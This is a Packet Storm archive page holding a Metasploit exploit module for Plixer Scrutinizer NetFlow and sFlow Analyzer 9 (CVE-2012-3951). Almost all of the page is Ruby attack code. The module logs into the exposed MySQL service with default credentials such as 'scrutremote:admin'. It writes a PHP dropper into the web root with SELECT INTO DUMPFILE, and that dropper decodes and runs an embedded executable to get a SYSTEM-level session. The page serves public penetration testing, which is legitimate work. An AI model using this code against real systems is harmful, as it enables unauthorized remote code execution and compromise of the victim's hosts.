exploit the possibilities

Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential

Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
Posted Aug 8, 2012
Authored by sinn3r, Mario Ceballos, Jonathan Claudius, Tanya Secker | Site metasploit.com

This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer. By default, the software installs a default password in MySQL, and binds the service to "0.0.0.0". This allows any remote user to login to MySQL, and then gain arbitrary remote code execution under the context of 'SYSTEM'. Examples of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.

tags | exploit, remote, arbitrary, code execution
advisories | CVE-2012-3951, OSVDB-84317
MD5 | dadd1bd0ca2360eb0022a698d14e8695

Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",
'Description' => %q{
This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.
By default, the software installs a default password in MySQL, and binds the
service to "0.0.0.0". This allows any remote user to login to MySQL, and then
gain arbitrary remote code execution under the context of 'SYSTEM'. Examples
of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mario Ceballos',
'Jonathan Claudius',
'Tanya Secker',
'sinn3r'
],
'References' =>
[
['CVE', '2012-3951'],
['OSVDB', '84317'],
['URL', 'http://secunia.com/advisories/50074/'],
['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
['Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jul 27 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new("USERNAME", [true, 'The default MySQL username', 'scrutremote']),
OptString.new("PASSWORD", [true, 'The default MySQL password', 'admin']),
OptPort.new("MYSQLPORT", [true, 'The MySQL\'s remote port', 3306]),
OptPort.new("HTTPPORT", [true, 'The HTTP Server\'s remote port', 80]),
OptString.new("TARGETURI", [true, 'The web application\'s base path', '/'])
], self.class)

# Both MySQL and HTTP need to use this, we'll have to register on the fly.
deregister_options('RPORT')
end


def check
tmp_rport = datastore['RPORT']
datastore['RPORT'] = datastore['HTTPPORT']
res = send_request_raw({'uri'=>target_uri.host})
datastore['RPORT'] = tmp_rport
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end


def get_php_payload(fname)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("#{fname}");
?>
|
php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
return php
end


#
# I wanna be able to choose my own destination... path!
#
def mysql_upload_binary(bindata, path)
# Modify the rport so we can use MySQL
datastore['RPORT'] = datastore['MYSQLPORT']

# Login
h = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])

# The lib throws its own error message anyway:
# "Exploit failed [no-access]: RbMysql::AccessDeniedError"
return false if not h

tmp = mysql_get_temp_dir
p = bindata.unpack("H*")[0]
dest = tmp + path
mysql_query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
return true
end


def exe_php(php_fname)
# Modify the rport so we can use HTTP
datastore['RPORT'] = datastore['HTTPPORT']

# Request our payload
path = File.dirname("#{target_uri.path}/.")
res = send_request_raw({'uri'=>"#{path}#{php_fname}"})
return (res and res.code == 200)
end


def cleanup
datastore['RPORT'] = @original_rport
end


def on_new_session(cli)
if cli.type != 'meterpreter'
print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")
return
end

cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

begin
print_status("Deleting #{@php_fname}")
cli.fs.file.rm(@php_fname)
rescue ::Exception => e
print_error("Please note: #{@php_fname} is stil on disk.")
end

begin
print_status("Deleting #{@exe_fname}")
cli.fs.file.rm(@exe_fname)
rescue ::Exception => e
print_error("Please note: #{@exe_fname} is still on disk.")
end
end


def exploit
@original_rport = datastore['RPORT']

#
# Prepare our payload (naughty exe embedded in php)
#
@exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'
p = get_php_payload(@exe_fname)

#
# Upload our payload to the html directory
#
print_status("Uploading #{p.length.to_s} bytes via MySQL...")
@php_fname = Rex::Text.rand_text_alpha(5) + '.php'
if not mysql_upload_binary(p, "../../html/#{@php_fname}")
print_error("That MySQL upload didn't work.")
return
end

#
# Execute the payload
#
print_status("Requesting #{@php_fname}...")
res = exe_php(@php_fname)

handler
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close